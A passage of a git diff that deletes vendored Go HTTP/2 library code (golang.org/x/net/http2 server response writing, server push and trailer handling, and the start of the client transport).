-type requestBody struct { - stream *stream - conn *serverConn - closed bool // for use by Close only - sawEOF bool // for use by Read only - pipe *pipe // non-nil if we have a HTTP entity message body - needsContinue bool // need to send a 100-continue -} - -func (b *requestBody) Close() error { - if b.pipe != nil && !b.closed { - b.pipe.BreakWithError(errClosedBody) - } - b.closed = true - return nil -} - -func (b *requestBody) Read(p []byte) (n int, err error) { - if b.needsContinue { - b.needsContinue = false - b.conn.write100ContinueHeaders(b.stream) - } - if b.pipe == nil || b.sawEOF { - return 0, io.EOF - } - n, err = b.pipe.Read(p) - if err == io.EOF { - b.sawEOF = true - } - if b.conn == nil && inTests { - return - } - b.conn.noteBodyReadFromHandler(b.stream, n, err) - return -} - -// responseWriter is the http.ResponseWriter implementation. It's -// intentionally small (1 pointer wide) to minimize garbage. The -// responseWriterState pointer inside is zeroed at the end of a -// request (in handlerDone) and calls on the responseWriter thereafter -// simply crash (caller's mistake), but the much larger responseWriterState -// and buffers are reused between multiple requests. -type responseWriter struct { - rws *responseWriterState -} - -// Optional http.ResponseWriter interfaces implemented. -var ( - _ http.CloseNotifier = (*responseWriter)(nil) - _ http.Flusher = (*responseWriter)(nil) - _ stringWriter = (*responseWriter)(nil) -) - -type responseWriterState struct { - // immutable within a request: - stream *stream - req *http.Request - body *requestBody // to close at end of request, if DATA frames didn't - conn *serverConn - - // TODO: adjust buffer writing sizes based on server config, frame size updates from peer, etc - bw *bufio.Writer // writing to a chunkWriter{this *responseWriterState} - - // mutated by http.Handler goroutine: - handlerHeader http.Header // nil until called - snapHeader http.Header // snapshot of handlerHeader at WriteHeader time - trailers []string // set in writeChunk - status int // status code passed to WriteHeader - wroteHeader bool // WriteHeader called (explicitly or implicitly). Not necessarily sent to user yet. - sentHeader bool // have we sent the header frame? - handlerDone bool // handler has finished - dirty bool // a Write failed; don't reuse this responseWriterState - - sentContentLen int64 // non-zero if handler set a Content-Length header - wroteBytes int64 - - closeNotifierMu sync.Mutex // guards closeNotifierCh - closeNotifierCh chan bool // nil until first used -} - -type chunkWriter struct{ rws *responseWriterState } - -func (cw chunkWriter) Write(p []byte) (n int, err error) { return cw.rws.writeChunk(p) } - -func (rws *responseWriterState) hasTrailers() bool { return len(rws.trailers) != 0 } - -// declareTrailer is called for each Trailer header when the -// response header is written. It notes that a header will need to be -// written in the trailers at the end of the response. -func (rws *responseWriterState) declareTrailer(k string) { - k = http.CanonicalHeaderKey(k) - if !ValidTrailerHeader(k) { - // Forbidden by RFC 2616 14.40. - rws.conn.logf("ignoring invalid trailer %q", k) - return - } - if !strSliceContains(rws.trailers, k) { - rws.trailers = append(rws.trailers, k) - } -} - -// writeChunk writes chunks from the bufio.Writer. But because -// bufio.Writer may bypass its chunking, sometimes p may be -// arbitrarily large. -// -// writeChunk is also responsible (on the first chunk) for sending the -// HEADER response. 
-func (rws *responseWriterState) writeChunk(p []byte) (n int, err error) { - if !rws.wroteHeader { - rws.writeHeader(200) - } - - isHeadResp := rws.req.Method == "HEAD" - if !rws.sentHeader { - rws.sentHeader = true - var ctype, clen string - if clen = rws.snapHeader.Get("Content-Length"); clen != "" { - rws.snapHeader.Del("Content-Length") - clen64, err := strconv.ParseInt(clen, 10, 64) - if err == nil && clen64 >= 0 { - rws.sentContentLen = clen64 - } else { - clen = "" - } - } - if clen == "" && rws.handlerDone && bodyAllowedForStatus(rws.status) && (len(p) > 0 || !isHeadResp) { - clen = strconv.Itoa(len(p)) - } - _, hasContentType := rws.snapHeader["Content-Type"] - if !hasContentType && bodyAllowedForStatus(rws.status) { - ctype = http.DetectContentType(p) - } - var date string - if _, ok := rws.snapHeader["Date"]; !ok { - // TODO(bradfitz): be faster here, like net/http? measure. - date = time.Now().UTC().Format(http.TimeFormat) - } - - for _, v := range rws.snapHeader["Trailer"] { - foreachHeaderElement(v, rws.declareTrailer) - } - - endStream := (rws.handlerDone && !rws.hasTrailers() && len(p) == 0) || isHeadResp - err = rws.conn.writeHeaders(rws.stream, &writeResHeaders{ - streamID: rws.stream.id, - httpResCode: rws.status, - h: rws.snapHeader, - endStream: endStream, - contentType: ctype, - contentLength: clen, - date: date, - }) - if err != nil { - rws.dirty = true - return 0, err - } - if endStream { - return 0, nil - } - } - if isHeadResp { - return len(p), nil - } - if len(p) == 0 && !rws.handlerDone { - return 0, nil - } - - if rws.handlerDone { - rws.promoteUndeclaredTrailers() - } - - endStream := rws.handlerDone && !rws.hasTrailers() - if len(p) > 0 || endStream { - // only send a 0 byte DATA frame if we're ending the stream. - if err := rws.conn.writeDataFromHandler(rws.stream, p, endStream); err != nil { - rws.dirty = true - return 0, err - } - } - - if rws.handlerDone && rws.hasTrailers() { - err = rws.conn.writeHeaders(rws.stream, &writeResHeaders{ - streamID: rws.stream.id, - h: rws.handlerHeader, - trailers: rws.trailers, - endStream: true, - }) - if err != nil { - rws.dirty = true - } - return len(p), err - } - return len(p), nil -} - -// TrailerPrefix is a magic prefix for ResponseWriter.Header map keys -// that, if present, signals that the map entry is actually for -// the response trailers, and not the response headers. The prefix -// is stripped after the ServeHTTP call finishes and the values are -// sent in the trailers. -// -// This mechanism is intended only for trailers that are not known -// prior to the headers being written. If the set of trailers is fixed -// or known before the header is written, the normal Go trailers mechanism -// is preferred: -// https://golang.org/pkg/net/http/#ResponseWriter -// https://golang.org/pkg/net/http/#example_ResponseWriter_trailers -const TrailerPrefix = "Trailer:" - -// promoteUndeclaredTrailers permits http.Handlers to set trailers -// after the header has already been flushed. Because the Go -// ResponseWriter interface has no way to set Trailers (only the -// Header), and because we didn't want to expand the ResponseWriter -// interface, and because nobody used trailers, and because RFC 2616 -// says you SHOULD (but not must) predeclare any trailers in the -// header, the official ResponseWriter rules said trailers in Go must -// be predeclared, and then we reuse the same ResponseWriter.Header() -// map to mean both Headers and Trailers. 
When it's time to write the -// Trailers, we pick out the fields of Headers that were declared as -// trailers. That worked for a while, until we found the first major -// user of Trailers in the wild: gRPC (using them only over http2), -// and gRPC libraries permit setting trailers mid-stream without -// predeclarnig them. So: change of plans. We still permit the old -// way, but we also permit this hack: if a Header() key begins with -// "Trailer:", the suffix of that key is a Trailer. Because ':' is an -// invalid token byte anyway, there is no ambiguity. (And it's already -// filtered out) It's mildly hacky, but not terrible. -// -// This method runs after the Handler is done and promotes any Header -// fields to be trailers. -func (rws *responseWriterState) promoteUndeclaredTrailers() { - for k, vv := range rws.handlerHeader { - if !strings.HasPrefix(k, TrailerPrefix) { - continue - } - trailerKey := strings.TrimPrefix(k, TrailerPrefix) - rws.declareTrailer(trailerKey) - rws.handlerHeader[http.CanonicalHeaderKey(trailerKey)] = vv - } - - if len(rws.trailers) > 1 { - sorter := sorterPool.Get().(*sorter) - sorter.SortStrings(rws.trailers) - sorterPool.Put(sorter) - } -} - -func (w *responseWriter) Flush() { - rws := w.rws - if rws == nil { - panic("Header called after Handler finished") - } - if rws.bw.Buffered() > 0 { - if err := rws.bw.Flush(); err != nil { - // Ignore the error. The frame writer already knows. - return - } - } else { - // The bufio.Writer won't call chunkWriter.Write - // (writeChunk with zero bytes, so we have to do it - // ourselves to force the HTTP response header and/or - // final DATA frame (with END_STREAM) to be sent. - rws.writeChunk(nil) - } -} - -func (w *responseWriter) CloseNotify() <-chan bool { - rws := w.rws - if rws == nil { - panic("CloseNotify called after Handler finished") - } - rws.closeNotifierMu.Lock() - ch := rws.closeNotifierCh - if ch == nil { - ch = make(chan bool, 1) - rws.closeNotifierCh = ch - cw := rws.stream.cw - go func() { - cw.Wait() // wait for close - ch <- true - }() - } - rws.closeNotifierMu.Unlock() - return ch -} - -func (w *responseWriter) Header() http.Header { - rws := w.rws - if rws == nil { - panic("Header called after Handler finished") - } - if rws.handlerHeader == nil { - rws.handlerHeader = make(http.Header) - } - return rws.handlerHeader -} - -func (w *responseWriter) WriteHeader(code int) { - rws := w.rws - if rws == nil { - panic("WriteHeader called after Handler finished") - } - rws.writeHeader(code) -} - -func (rws *responseWriterState) writeHeader(code int) { - if !rws.wroteHeader { - rws.wroteHeader = true - rws.status = code - if len(rws.handlerHeader) > 0 { - rws.snapHeader = cloneHeader(rws.handlerHeader) - } - } -} - -func cloneHeader(h http.Header) http.Header { - h2 := make(http.Header, len(h)) - for k, vv := range h { - vv2 := make([]string, len(vv)) - copy(vv2, vv) - h2[k] = vv2 - } - return h2 -} - -// The Life Of A Write is like this: -// -// * Handler calls w.Write or w.WriteString -> -// * -> rws.bw (*bufio.Writer) -> -// * (Handler might call Flush) -// * -> chunkWriter{rws} -// * -> responseWriterState.writeChunk(p []byte) -// * -> responseWriterState.writeChunk (most of the magic; see comment there) -func (w *responseWriter) Write(p []byte) (n int, err error) { - return w.write(len(p), p, "") -} - -func (w *responseWriter) WriteString(s string) (n int, err error) { - return w.write(len(s), nil, s) -} - -// either dataB or dataS is non-zero. 
-func (w *responseWriter) write(lenData int, dataB []byte, dataS string) (n int, err error) { - rws := w.rws - if rws == nil { - panic("Write called after Handler finished") - } - if !rws.wroteHeader { - w.WriteHeader(200) - } - if !bodyAllowedForStatus(rws.status) { - return 0, http.ErrBodyNotAllowed - } - rws.wroteBytes += int64(len(dataB)) + int64(len(dataS)) // only one can be set - if rws.sentContentLen != 0 && rws.wroteBytes > rws.sentContentLen { - // TODO: send a RST_STREAM - return 0, errors.New("http2: handler wrote more than declared Content-Length") - } - - if dataB != nil { - return rws.bw.Write(dataB) - } else { - return rws.bw.WriteString(dataS) - } -} - -func (w *responseWriter) handlerDone() { - rws := w.rws - dirty := rws.dirty - rws.handlerDone = true - w.Flush() - w.rws = nil - if !dirty { - // Only recycle the pool if all prior Write calls to - // the serverConn goroutine completed successfully. If - // they returned earlier due to resets from the peer - // there might still be write goroutines outstanding - // from the serverConn referencing the rws memory. See - // issue 20704. - responseWriterStatePool.Put(rws) - } -} - -// Push errors. -var ( - ErrRecursivePush = errors.New("http2: recursive push not allowed") - ErrPushLimitReached = errors.New("http2: push would exceed peer's SETTINGS_MAX_CONCURRENT_STREAMS") -) - -// pushOptions is the internal version of http.PushOptions, which we -// cannot include here because it's only defined in Go 1.8 and later. -type pushOptions struct { - Method string - Header http.Header -} - -func (w *responseWriter) push(target string, opts pushOptions) error { - st := w.rws.stream - sc := st.sc - sc.serveG.checkNotOn() - - // No recursive pushes: "PUSH_PROMISE frames MUST only be sent on a peer-initiated stream." - // http://tools.ietf.org/html/rfc7540#section-6.6 - if st.isPushed() { - return ErrRecursivePush - } - - // Default options. - if opts.Method == "" { - opts.Method = "GET" - } - if opts.Header == nil { - opts.Header = http.Header{} - } - wantScheme := "http" - if w.rws.req.TLS != nil { - wantScheme = "https" - } - - // Validate the request. - u, err := url.Parse(target) - if err != nil { - return err - } - if u.Scheme == "" { - if !strings.HasPrefix(target, "/") { - return fmt.Errorf("target must be an absolute URL or an absolute path: %q", target) - } - u.Scheme = wantScheme - u.Host = w.rws.req.Host - } else { - if u.Scheme != wantScheme { - return fmt.Errorf("cannot push URL with scheme %q from request with scheme %q", u.Scheme, wantScheme) - } - if u.Host == "" { - return errors.New("URL must have a host") - } - } - for k := range opts.Header { - if strings.HasPrefix(k, ":") { - return fmt.Errorf("promised request headers cannot include pseudo header %q", k) - } - // These headers are meaningful only if the request has a body, - // but PUSH_PROMISE requests cannot have a body. - // http://tools.ietf.org/html/rfc7540#section-8.2 - // Also disallow Host, since the promised URL must be absolute. 
- switch strings.ToLower(k) { - case "content-length", "content-encoding", "trailer", "te", "expect", "host": - return fmt.Errorf("promised request headers cannot include %q", k) - } - } - if err := checkValidHTTP2RequestHeaders(opts.Header); err != nil { - return err - } - - // The RFC effectively limits promised requests to GET and HEAD: - // "Promised requests MUST be cacheable [GET, HEAD, or POST], and MUST be safe [GET or HEAD]" - // http://tools.ietf.org/html/rfc7540#section-8.2 - if opts.Method != "GET" && opts.Method != "HEAD" { - return fmt.Errorf("method %q must be GET or HEAD", opts.Method) - } - - msg := &startPushRequest{ - parent: st, - method: opts.Method, - url: u, - header: cloneHeader(opts.Header), - done: errChanPool.Get().(chan error), - } - - select { - case <-sc.doneServing: - return errClientDisconnected - case <-st.cw: - return errStreamClosed - case sc.serveMsgCh <- msg: - } - - select { - case <-sc.doneServing: - return errClientDisconnected - case <-st.cw: - return errStreamClosed - case err := <-msg.done: - errChanPool.Put(msg.done) - return err - } -} - -type startPushRequest struct { - parent *stream - method string - url *url.URL - header http.Header - done chan error -} - -func (sc *serverConn) startPush(msg *startPushRequest) { - sc.serveG.check() - - // http://tools.ietf.org/html/rfc7540#section-6.6. - // PUSH_PROMISE frames MUST only be sent on a peer-initiated stream that - // is in either the "open" or "half-closed (remote)" state. - if msg.parent.state != stateOpen && msg.parent.state != stateHalfClosedRemote { - // responseWriter.Push checks that the stream is peer-initiaed. - msg.done <- errStreamClosed - return - } - - // http://tools.ietf.org/html/rfc7540#section-6.6. - if !sc.pushEnabled { - msg.done <- http.ErrNotSupported - return - } - - // PUSH_PROMISE frames must be sent in increasing order by stream ID, so - // we allocate an ID for the promised stream lazily, when the PUSH_PROMISE - // is written. Once the ID is allocated, we start the request handler. - allocatePromisedID := func() (uint32, error) { - sc.serveG.check() - - // Check this again, just in case. Technically, we might have received - // an updated SETTINGS by the time we got around to writing this frame. - if !sc.pushEnabled { - return 0, http.ErrNotSupported - } - // http://tools.ietf.org/html/rfc7540#section-6.5.2. - if sc.curPushedStreams+1 > sc.clientMaxStreams { - return 0, ErrPushLimitReached - } - - // http://tools.ietf.org/html/rfc7540#section-5.1.1. - // Streams initiated by the server MUST use even-numbered identifiers. - // A server that is unable to establish a new stream identifier can send a GOAWAY - // frame so that the client is forced to open a new connection for new streams. - if sc.maxPushPromiseID+2 >= 1<<31 { - sc.startGracefulShutdownInternal() - return 0, ErrPushLimitReached - } - sc.maxPushPromiseID += 2 - promisedID := sc.maxPushPromiseID - - // http://tools.ietf.org/html/rfc7540#section-8.2. - // Strictly speaking, the new stream should start in "reserved (local)", then - // transition to "half closed (remote)" after sending the initial HEADERS, but - // we start in "half closed (remote)" for simplicity. - // See further comments at the definition of stateHalfClosedRemote. 
- promised := sc.newStream(promisedID, msg.parent.id, stateHalfClosedRemote) - rw, req, err := sc.newWriterAndRequestNoBody(promised, requestParam{ - method: msg.method, - scheme: msg.url.Scheme, - authority: msg.url.Host, - path: msg.url.RequestURI(), - header: cloneHeader(msg.header), // clone since handler runs concurrently with writing the PUSH_PROMISE - }) - if err != nil { - // Should not happen, since we've already validated msg.url. - panic(fmt.Sprintf("newWriterAndRequestNoBody(%+v): %v", msg.url, err)) - } - - go sc.runHandler(rw, req, sc.handler.ServeHTTP) - return promisedID, nil - } - - sc.writeFrame(FrameWriteRequest{ - write: &writePushPromise{ - streamID: msg.parent.id, - method: msg.method, - url: msg.url, - h: msg.header, - allocatePromisedID: allocatePromisedID, - }, - stream: msg.parent, - done: msg.done, - }) -} - -// foreachHeaderElement splits v according to the "#rule" construction -// in RFC 2616 section 2.1 and calls fn for each non-empty element. -func foreachHeaderElement(v string, fn func(string)) { - v = textproto.TrimString(v) - if v == "" { - return - } - if !strings.Contains(v, ",") { - fn(v) - return - } - for _, f := range strings.Split(v, ",") { - if f = textproto.TrimString(f); f != "" { - fn(f) - } - } -} - -// From http://httpwg.org/specs/rfc7540.html#rfc.section.8.1.2.2 -var connHeaders = []string{ - "Connection", - "Keep-Alive", - "Proxy-Connection", - "Transfer-Encoding", - "Upgrade", -} - -// checkValidHTTP2RequestHeaders checks whether h is a valid HTTP/2 request, -// per RFC 7540 Section 8.1.2.2. -// The returned error is reported to users. -func checkValidHTTP2RequestHeaders(h http.Header) error { - for _, k := range connHeaders { - if _, ok := h[k]; ok { - return fmt.Errorf("request header %q is not valid in HTTP/2", k) - } - } - te := h["Te"] - if len(te) > 0 && (len(te) > 1 || (te[0] != "trailers" && te[0] != "")) { - return errors.New(`request header "TE" may only be "trailers" in HTTP/2`) - } - return nil -} - -func new400Handler(err error) http.HandlerFunc { - return func(w http.ResponseWriter, r *http.Request) { - http.Error(w, err.Error(), http.StatusBadRequest) - } -} - -// ValidTrailerHeader reports whether name is a valid header field name to appear -// in trailers. -// See: http://tools.ietf.org/html/rfc7230#section-4.1.2 -func ValidTrailerHeader(name string) bool { - name = http.CanonicalHeaderKey(name) - if strings.HasPrefix(name, "If-") || badTrailer[name] { - return false - } - return true -} - -var badTrailer = map[string]bool{ - "Authorization": true, - "Cache-Control": true, - "Connection": true, - "Content-Encoding": true, - "Content-Length": true, - "Content-Range": true, - "Content-Type": true, - "Expect": true, - "Host": true, - "Keep-Alive": true, - "Max-Forwards": true, - "Pragma": true, - "Proxy-Authenticate": true, - "Proxy-Authorization": true, - "Proxy-Connection": true, - "Range": true, - "Realm": true, - "Te": true, - "Trailer": true, - "Transfer-Encoding": true, - "Www-Authenticate": true, -} - -// h1ServerKeepAlivesDisabled reports whether hs has its keep-alives -// disabled. See comments on h1ServerShutdownChan above for why -// the code is written this way. 
-func h1ServerKeepAlivesDisabled(hs *http.Server) bool { - var x interface{} = hs - type I interface { - doKeepAlives() bool - } - if hs, ok := x.(I); ok { - return !hs.doKeepAlives() - } - return false -} diff --git a/vendor/golang.org/x/net/http2/transport.go b/vendor/golang.org/x/net/http2/transport.go deleted file mode 100644 index 850d7ae0..00000000 --- a/vendor/golang.org/x/net/http2/transport.go +++ /dev/null @@ -1,2134 +0,0 @@ -// Copyright 2015 The Go Authors. All rights reserved. -// Use of this source code is governed by a BSD-style -// license that can be found in the LICENSE file. - -// Transport code. - -package http2 - -import ( - "bufio" - "bytes" - "compress/gzip" - "crypto/rand" - "crypto/tls" - "errors" - "fmt" - "io" - "io/ioutil" - "log" - "math" - "net" - "net/http" - "sort" - "strconv" - "strings" - "sync" - "time" - - "golang.org/x/net/http2/hpack" - "golang.org/x/net/idna" - "golang.org/x/net/lex/httplex" -) - -const ( - // transportDefaultConnFlow is how many connection-level flow control - // tokens we give the server at start-up, past the default 64k. - transportDefaultConnFlow = 1 << 30 - - // transportDefaultStreamFlow is how many stream-level flow - // control tokens we announce to the peer, and how many bytes - // we buffer per stream. - transportDefaultStreamFlow = 4 << 20 - - // transportDefaultStreamMinRefresh is the minimum number of bytes we'll send - // a stream-level WINDOW_UPDATE for at a time. - transportDefaultStreamMinRefresh = 4 << 10 - - defaultUserAgent = "Go-http-client/2.0" -) - -// Transport is an HTTP/2 Transport. -// -// A Transport internally caches connections to servers. It is safe -// for concurrent use by multiple goroutines. -type Transport struct { - // DialTLS specifies an optional dial function for creating - // TLS connections for requests. - // - // If DialTLS is nil, tls.Dial is used. - // - // If the returned net.Conn has a ConnectionState method like tls.Conn, - // it will be used to set http.Response.TLS. - DialTLS func(network, addr string, cfg *tls.Config) (net.Conn, error) - - // TLSClientConfig specifies the TLS configuration to use with - // tls.Client. If nil, the default configuration is used. - TLSClientConfig *tls.Config - - // ConnPool optionally specifies an alternate connection pool to use. - // If nil, the default is used. - ConnPool ClientConnPool - - // DisableCompression, if true, prevents the Transport from - // requesting compression with an "Accept-Encoding: gzip" - // request header when the Request contains no existing - // Accept-Encoding value. If the Transport requests gzip on - // its own and gets a gzipped response, it's transparently - // decoded in the Response.Body. However, if the user - // explicitly requested gzip it is not automatically - // uncompressed. - DisableCompression bool - - // AllowHTTP, if true, permits HTTP/2 requests using the insecure, - // plain-text "http" scheme. Note that this does not enable h2c support. - AllowHTTP bool - - // MaxHeaderListSize is the http2 SETTINGS_MAX_HEADER_LIST_SIZE to - // send in the initial settings frame. It is how many bytes - // of response headers are allow. Unlike the http2 spec, zero here - // means to use a default limit (currently 10MB). If you actually - // want to advertise an ulimited value to the peer, Transport - // interprets the highest possible value here (0xffffffff or 1<<32-1) - // to mean no limit. - MaxHeaderListSize uint32 - - // t1, if non-nil, is the standard library Transport using - // this transport. 
Its settings are used (but not its - // RoundTrip method, etc). - t1 *http.Transport - - connPoolOnce sync.Once - connPoolOrDef ClientConnPool // non-nil version of ConnPool -} - -func (t *Transport) maxHeaderListSize() uint32 { - if t.MaxHeaderListSize == 0 { - return 10 << 20 - } - if t.MaxHeaderListSize == 0xffffffff { - return 0 - } - return t.MaxHeaderListSize -} - -func (t *Transport) disableCompression() bool { - return t.DisableCompression || (t.t1 != nil && t.t1.DisableCompression) -} - -var errTransportVersion = errors.New("http2: ConfigureTransport is only supported starting at Go 1.6") - -// ConfigureTransport configures a net/http HTTP/1 Transport to use HTTP/2. -// It requires Go 1.6 or later and returns an error if the net/http package is too old -// or if t1 has already been HTTP/2-enabled. -func ConfigureTransport(t1 *http.Transport) error { - _, err := configureTransport(t1) // in configure_transport.go (go1.6) or not_go16.go - return err -} - -func (t *Transport) connPool() ClientConnPool { - t.connPoolOnce.Do(t.initConnPool) - return t.connPoolOrDef -} - -func (t *Transport) initConnPool() { - if t.ConnPool != nil { - t.connPoolOrDef = t.ConnPool - } else { - t.connPoolOrDef = &clientConnPool{t: t} - } -} - -// ClientConn is the state of a single HTTP/2 client connection to an -// HTTP/2 server. -type ClientConn struct { - t *Transport - tconn net.Conn // usually *tls.Conn, except specialized impls - tlsState *tls.ConnectionState // nil only for specialized impls - singleUse bool // whether being used for a single http.Request - - // readLoop goroutine fields: - readerDone chan struct{} // closed on error - readerErr error // set before readerDone is closed - - idleTimeout time.Duration // or 0 for never - idleTimer *time.Timer - - mu sync.Mutex // guards following - cond *sync.Cond // hold mu; broadcast on flow/closed changes - flow flow // our conn-level flow control quota (cs.flow is per stream) - inflow flow // peer's conn-level flow control - closed bool - wantSettingsAck bool // we sent a SETTINGS frame and haven't heard back - goAway *GoAwayFrame // if non-nil, the GoAwayFrame we received - goAwayDebug string // goAway frame's debug data, retained as a string - streams map[uint32]*clientStream // client-initiated - nextStreamID uint32 - pings map[[8]byte]chan struct{} // in flight ping data to notification channel - bw *bufio.Writer - br *bufio.Reader - fr *Framer - lastActive time.Time - // Settings from peer: (also guarded by mu) - maxFrameSize uint32 - maxConcurrentStreams uint32 - initialWindowSize uint32 - - hbuf bytes.Buffer // HPACK encoder writes into this - henc *hpack.Encoder - freeBuf [][]byte - - wmu sync.Mutex // held while writing; acquire AFTER mu if holding both - werr error // first write error that has occurred -} - -// clientStream is the state for a single HTTP/2 stream. One of these -// is created for each Transport.RoundTrip call. 
-type clientStream struct { - cc *ClientConn - req *http.Request - trace *clientTrace // or nil - ID uint32 - resc chan resAndError - bufPipe pipe // buffered pipe with the flow-controlled response payload - startedWrite bool // started request body write; guarded by cc.mu - requestedGzip bool - on100 func() // optional code to run if get a 100 continue response - - flow flow // guarded by cc.mu - inflow flow // guarded by cc.mu - bytesRemain int64 // -1 means unknown; owned by transportResponseBody.Read - readErr error // sticky read error; owned by transportResponseBody.Read - stopReqBody error // if non-nil, stop writing req body; guarded by cc.mu - didReset bool // whether we sent a RST_STREAM to the server; guarded by cc.mu - - peerReset chan struct{} // closed on peer reset - resetErr error // populated before peerReset is closed - - done chan struct{} // closed when stream remove from cc.streams map; close calls guarded by cc.mu - - // owned by clientConnReadLoop: - firstByte bool // got the first response byte - pastHeaders bool // got first MetaHeadersFrame (actual headers) - pastTrailers bool // got optional second MetaHeadersFrame (trailers) - - trailer http.Header // accumulated trailers - resTrailer *http.Header // client's Response.Trailer -} - -// awaitRequestCancel runs in its own goroutine and waits for the user -// to cancel a RoundTrip request, its context to expire, or for the -// request to be done (any way it might be removed from the cc.streams -// map: peer reset, successful completion, TCP connection breakage, -// etc) -func (cs *clientStream) awaitRequestCancel(req *http.Request) { - ctx := reqContext(req) - if req.Cancel == nil && ctx.Done() == nil { - return - } - select { - case <-req.Cancel: - cs.cancelStream() - cs.bufPipe.CloseWithError(errRequestCanceled) - case <-ctx.Done(): - cs.cancelStream() - cs.bufPipe.CloseWithError(ctx.Err()) - case <-cs.done: - } -} - -func (cs *clientStream) cancelStream() { - cs.cc.mu.Lock() - didReset := cs.didReset - cs.didReset = true - cs.cc.mu.Unlock() - - if !didReset { - cs.cc.writeStreamReset(cs.ID, ErrCodeCancel, nil) - } -} - -// checkResetOrDone reports any error sent in a RST_STREAM frame by the -// server, or errStreamClosed if the stream is complete. -func (cs *clientStream) checkResetOrDone() error { - select { - case <-cs.peerReset: - return cs.resetErr - case <-cs.done: - return errStreamClosed - default: - return nil - } -} - -func (cs *clientStream) abortRequestBodyWrite(err error) { - if err == nil { - panic("nil error") - } - cc := cs.cc - cc.mu.Lock() - cs.stopReqBody = err - cc.cond.Broadcast() - cc.mu.Unlock() -} - -type stickyErrWriter struct { - w io.Writer - err *error -} - -func (sew stickyErrWriter) Write(p []byte) (n int, err error) { - if *sew.err != nil { - return 0, *sew.err - } - n, err = sew.w.Write(p) - *sew.err = err - return -} - -var ErrNoCachedConn = errors.New("http2: no cached connection was available") - -// RoundTripOpt are options for the Transport.RoundTripOpt method. -type RoundTripOpt struct { - // OnlyCachedConn controls whether RoundTripOpt may - // create a new TCP connection. If set true and - // no cached connection is available, RoundTripOpt - // will return ErrNoCachedConn. - OnlyCachedConn bool -} - -func (t *Transport) RoundTrip(req *http.Request) (*http.Response, error) { - return t.RoundTripOpt(req, RoundTripOpt{}) -} - -// authorityAddr returns a given authority (a host/IP, or host:port / ip:port) -// and returns a host:port. The port 443 is added if needed. 
-func authorityAddr(scheme string, authority string) (addr string) { - host, port, err := net.SplitHostPort(authority) - if err != nil { // authority didn't have a port - port = "443" - if scheme == "http" { - port = "80" - } - host = authority - } - if a, err := idna.ToASCII(host); err == nil { - host = a - } - // IPv6 address literal, without a port: - if strings.HasPrefix(host, "[") && strings.HasSuffix(host, "]") { - return host + ":" + port - } - return net.JoinHostPort(host, port) -} - -// RoundTripOpt is like RoundTrip, but takes options. -func (t *Transport) RoundTripOpt(req *http.Request, opt RoundTripOpt) (*http.Response, error) { - if !(req.URL.Scheme == "https" || (req.URL.Scheme == "http" && t.AllowHTTP)) { - return nil, errors.New("http2: unsupported scheme") - } - - addr := authorityAddr(req.URL.Scheme, req.URL.Host) - for { - cc, err := t.connPool().GetClientConn(req, addr) - if err != nil { - t.vlogf("http2: Transport failed to get client conn for %s: %v", addr, err) - return nil, err - } - traceGotConn(req, cc) - res, err := cc.RoundTrip(req) - if err != nil { - if req, err = shouldRetryRequest(req, err); err == nil { - continue - } - } - if err != nil { - t.vlogf("RoundTrip failure: %v", err) - return nil, err - } - return res, nil - } -} - -// CloseIdleConnections closes any connections which were previously -// connected from previous requests but are now sitting idle. -// It does not interrupt any connections currently in use. -func (t *Transport) CloseIdleConnections() { - if cp, ok := t.connPool().(clientConnPoolIdleCloser); ok { - cp.closeIdleConnections() - } -} - -var ( - errClientConnClosed = errors.New("http2: client conn is closed") - errClientConnUnusable = errors.New("http2: client conn not usable") - - errClientConnGotGoAway = errors.New("http2: Transport received Server's graceful shutdown GOAWAY") - errClientConnGotGoAwayAfterSomeReqBody = errors.New("http2: Transport received Server's graceful shutdown GOAWAY; some request body already written") -) - -// shouldRetryRequest is called by RoundTrip when a request fails to get -// response headers. It is always called with a non-nil error. -// It returns either a request to retry (either the same request, or a -// modified clone), or an error if the request can't be replayed. -func shouldRetryRequest(req *http.Request, err error) (*http.Request, error) { - switch err { - default: - return nil, err - case errClientConnUnusable, errClientConnGotGoAway: - return req, nil - case errClientConnGotGoAwayAfterSomeReqBody: - // If the Body is nil (or http.NoBody), it's safe to reuse - // this request and its Body. - if req.Body == nil || reqBodyIsNoBody(req.Body) { - return req, nil - } - // Otherwise we depend on the Request having its GetBody - // func defined. 
- getBody := reqGetBody(req) // Go 1.8: getBody = req.GetBody - if getBody == nil { - return nil, errors.New("http2: Transport: peer server initiated graceful shutdown after some of Request.Body was written; define Request.GetBody to avoid this error") - } - body, err := getBody() - if err != nil { - return nil, err - } - newReq := *req - newReq.Body = body - return &newReq, nil - } -} - -func (t *Transport) dialClientConn(addr string, singleUse bool) (*ClientConn, error) { - host, _, err := net.SplitHostPort(addr) - if err != nil { - return nil, err - } - tconn, err := t.dialTLS()("tcp", addr, t.newTLSConfig(host)) - if err != nil { - return nil, err - } - return t.newClientConn(tconn, singleUse) -} - -func (t *Transport) newTLSConfig(host string) *tls.Config { - cfg := new(tls.Config) - if t.TLSClientConfig != nil { - *cfg = *cloneTLSConfig(t.TLSClientConfig) - } - if !strSliceContains(cfg.NextProtos, NextProtoTLS) { - cfg.NextProtos = append([]string{NextProtoTLS}, cfg.NextProtos...) - } - if cfg.ServerName == "" { - cfg.ServerName = host - } - return cfg -} - -func (t *Transport) dialTLS() func(string, string, *tls.Config) (net.Conn, error) { - if t.DialTLS != nil { - return t.DialTLS - } - return t.dialTLSDefault -} - -func (t *Transport) dialTLSDefault(network, addr string, cfg *tls.Config) (net.Conn, error) { - cn, err := tls.Dial(network, addr, cfg) - if err != nil { - return nil, err - } - if err := cn.Handshake(); err != nil { - return nil, err - } - if !cfg.InsecureSkipVerify { - if err := cn.VerifyHostname(cfg.ServerName); err != nil { - return nil, err - } - } - state := cn.ConnectionState() - if p := state.NegotiatedProtocol; p != NextProtoTLS { - return nil, fmt.Errorf("http2: unexpected ALPN protocol %q; want %q", p, NextProtoTLS) - } - if !state.NegotiatedProtocolIsMutual { - return nil, errors.New("http2: could not negotiate protocol mutually") - } - return cn, nil -} - -// disableKeepAlives reports whether connections should be closed as -// soon as possible after handling the first request. -func (t *Transport) disableKeepAlives() bool { - return t.t1 != nil && t.t1.DisableKeepAlives -} - -func (t *Transport) expectContinueTimeout() time.Duration { - if t.t1 == nil { - return 0 - } - return transportExpectContinueTimeout(t.t1) -} - -func (t *Transport) NewClientConn(c net.Conn) (*ClientConn, error) { - return t.newClientConn(c, false) -} - -func (t *Transport) newClientConn(c net.Conn, singleUse bool) (*ClientConn, error) { - cc := &ClientConn{ - t: t, - tconn: c, - readerDone: make(chan struct{}), - nextStreamID: 1, - maxFrameSize: 16 << 10, // spec default - 